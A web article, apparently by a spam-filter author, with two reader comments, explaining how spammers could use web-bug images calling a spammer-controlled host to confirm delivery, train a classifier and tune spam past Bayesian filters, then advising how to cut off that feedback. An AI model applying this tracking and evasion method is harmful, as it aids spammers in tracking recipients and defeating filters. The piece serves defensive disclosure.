UseTheSource
search UseTheSource:
 
The Reciprocal of Hype
 
 UseTheSource
Be the change you want to see in the world

- About
- Topics
- FAQ
- Authors


- Preferences
- Search
- Submit Story

 Sections
UseTheSource is divided into the following sections:

Articles 8/23 (1)

 UseTheSource Store

Engineer care and use instructions

Blessed are the geek

0wn3ed


 Latest News

 
How to beat a Bayesian spam filter
posted by MCP on Monday May 19, @07:47AM Google velocity: 117 hours
News OK, that's a pretty inflammatory title, and you might think that since my program POPFile is both Bayesian and gets used for spam fighting that I am crazy to publish a paper about how to get around a spam filter.

Or perhaps you just think I'm evil.

But it's essential that everyone thinks about not only how their spam filter works, but how it might be broken.

Here I describe a technique using email messages and web bugs that can be used to test for the presence of a spam filter and then examine its properties to see what types of spam are likely to get through.

The Problem (for a spammer)

Some antispam technologies (such as Spam Assassin) make it easy for a spammer to determine whether their message is going to be caught: they just run it through the program themselves (in Spam Assassin's case they also publish a nice list of how they catch spam on their web site which could be read as a HOWTO on what not to put in a spam message).

There are even companies like XXX that offer a service to people who want to send out mail and get it past spam filters. They'll check the message for you.

But Bayesian filters present a problem for the spammer... they are not one-size-fits-all programs that anyone can run. They are tailored by each individual and they learn as spam is received.

So the spammer is left with no defense against the spam filter, which is why Bayesian filters are both popular and successful. They catch spam and they make it hard for a spammer to figure out how to get their message to you.

Web Bugs

They key question a spammer wants to know the answer to is "did my message get through?" Luckily the use of HTML in email and the automatic display of HTML gives them a way to answer that question.

Currently web bugs are used to validate your email address. They help a spammer know which email addresses work and which should be junked, and they work even though the spammer has forged the return address on the email.

A web bug is a tiny (often invisible) image that is part of the spam messages that you receive. In HTML it could look something like this:

<img src=http://www.spammer-controlled-site.com/webbug.cgi?email=ABCDEF>

The email program will go to www.spammer-controlled-site.com and request the image called webbug.cgi?email=ABCDEF. The site responds with a tiny image (often white with 1 pixel by 1 pixel) but also makes a note of the email address (your real email address would replace ABCDEF in the example). The instant that you look at the spam, the spammer knows that your email address is valid and boom you get more spam.

Web Bugs Can Track Filter Hopping

It's pretty easy to see that once a web bug fires the spammer can use it to pass back any information that they want. One possibility would be to give every spam they send out a unique number and have a web bug like this:

<img src=http://www.spammer-controlled-site.com/webbug.cgi?email=ABCDEF&id;=12345>

The ABCDEF is the email address of the recipient and the 12345 the unique number of this specific message. When the spam is loaded the spammer can track which people received exactlt which messages.

So you can imagine a process where a spammer sends a message to a specific recipient and then tracks the firing of the web bug to see whether the spam passed through the recipient's spam filter.

That process could even look like a long runnnig function call. Imagine that such a function exists, call it filter-test, it might be defined like this:

bool filter-test( EMAIL_ADDRESS to, EMAIL_ID number )

A spammer would call filter-test with an email address to send the message to, and the unique number of the message. filter-test would send the message to the recipient with the specially designed web bug inside it, wait for a response (with a timeout) and then return true if the message passed through the filter.

In pseudocode filter-test looks like this:

bool filter-test( EMAIL_ADDRESS to, EMAIL_ID number ) 
{
    Retrieve the unique email with id number
    Add the web bug
        <img src=http://www.spammer-controlled-site.com/
                               webbug.cgi?email=to&id;=number>
    Send the email with recipient 'to'
    Wait for the web bug to fire
       If it fires then return true
       If after some timeout period it does not fire return false
}

So now the spammer can use filter-test to send a sequence of emails and get back yes/no responses that give a fuzzy idea of what happened. A yes means that the message got through, a no means that perhaps it didn't get through, or perhaps the user is on vacation, or perhaps the user is behind a firewall.

Fortunately, there are good machine learning algorithms for dealing with fuzzy information and trying to make decisions from them. One search algorithm is, well, Bayes rule.

Bayes fights Bayes

What the spammer needs is a way of telling whether a message is likely to get past your individual spam filter. What the user of a Bayesian filter has is an adaptive mechansim for assigning a likelihood that a message is spam.

So what a spammer really needs is a Bayesian filter that is trained based on an individual end user's acceptance or non-acceptance of various spam messages. With such a program the spammer could test new spam messages to see whether they are likely to get through.

To make this work the spammer sets up a Bayesian learning system like POPFile with go and no go categories. Messages are placed in go if they were received by the end user and in no go if they were not. Using filter-test and a handful of sample mails the spammer can automatically build the corpus for go and no go and keep it up dated over time.

As new spam campaigns are created the spammer uses the Bayesian system by asking it how it would classify the new message they are about to send. If it looks like a go then it gets sent, if a no go then the message is tweaked (perhaps automatically) until it's a go. As the campaign progresses the spammer can use feedback from filter-test on the campaign mails to further refine the corpus.

Stopping the Arms Race

There's a simple solution to stopping this Bayes vs. Bayes arms race, it's essential to cut spammers out of the feedback loop. Doing that means stopping web bugs, never replying to spammers' mails and never bouncing spams.

If spammers cannot get feedback on whether their mails are being read, they can't refine their message and Bayesian spam filters will remain successful. Practically speaking, that means you should not bounce spams, and you should not reply to, or click on unsubscribe links. You should also disable the loading of images by your email client (or even disable HTML email altogether).

PayPal scam alert | The Microsoft Lord's Prayer  >

 

 
 UseTheSource Login
Nickname:

Password:

 Related Links
  • POPFile
  • Spam Assassin
  • More on News
  • Also by MCP
  •  Translation
    Read this page in:

    - French
    - Spanish
    - German
    - Italian

    Using FreeTranslation.com

    'How to beat a Bayesian spam filter' | Login/Create an Account | 2 comments | Search Discussion
    Threshold:
    The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
    Block webbugs and then post them (Score:0)
    by Anonymous Coward on Monday May 19, @01:25PM EST (#1)
    I use mutt to avoid all webbugs, but I suggest you give spammers false positives by getting image sources for all kinds of user-ids "uce@ftc.gov" Probably need to obfuscate the source IP of the client unfortunately.
    [ Reply to This | Parent ]
    Spammers won't care about POPFile (Score:1)
    by plover on Friday June 13, @04:15PM EST (#2)
    (User #965 Info)
    I don't think spammers care about Bayesian filters, or any "single-user" filtering scheme. Getting spam out to "one more user" is not profitable. It's too expensive to work on a machine-by-machine level. It defeats the goal of spam, which is to claim to have sent an email to 1 million users. Getting spam past the big mechanized spam filters at the ISP level is the spammers' true goal.

    Many (most) people sign up with their ISPs to use a spam filter. Only a handful of dedicated fanatics are savvy enough to run a personal filter. (OK, it may be a million people, but with a billion on line it's still less than a percent.) Spammers can't afford to hack each individual machine's filter. They'll run a copy of Spam Assassin and tweak their messages to get past the ISPs' filters, sure, but they're not after POPFile or any specific Bayesian filter. It's just too expensive.

    As an aside, I think the web bugs may have two purposes: not only do they validate addresses as live, but I think they provide "proof of receipt" to the spammers' customers who are paying for the crap.

    This brings up another related point: for the most part, spammers really don't care if you read their mail or buy their products. The spammer makes his or her money by fleecing shady and quasi-legitimate businesses, not by selling HGH or Viagra online. Remember, there are two external parties involved in any spam: those who are selling crap, and those who are selling email advertising services. The spammers promise to send out a million ads for $299.95. KingPager@beepers.r.us is trying to sell beepers, but is simply too stupid to understand that while he's cursing "spam" at home, he's enriching Ralsky for an "effective online advertising campaign." He doesn't understand that when he clicks delete, so does EVERYONE else.

    Spam pays only the spammer. People say that spam works because %0.1 of people buy the advertised product. I don't believe that figure for a second. I doubt that %0.001 of the spam generates sales, and if you're paying $300 for a million emails, you'd better be making $33.33 profit per sale. That's hard when you're selling schlock like counterfeit copies of Norton Systemworks at $19.99 a pop.

    (The sole exception would be spam for free online pr0n, as they get paid by the advertisers for eyeballs, and free pr0n ALWAYS gets eyeballs.)

    So, the victims of spam are at least twofold: us, the unlucky recipients of the crap; and the stupid business owners who fall for the "Make money fast by advertising in email" pitch. But the Ralskys truly "make money fast."

    [ Reply to This | Parent ]

    [ home | contribute story | older articles | past polls | faq | authors | preferences ]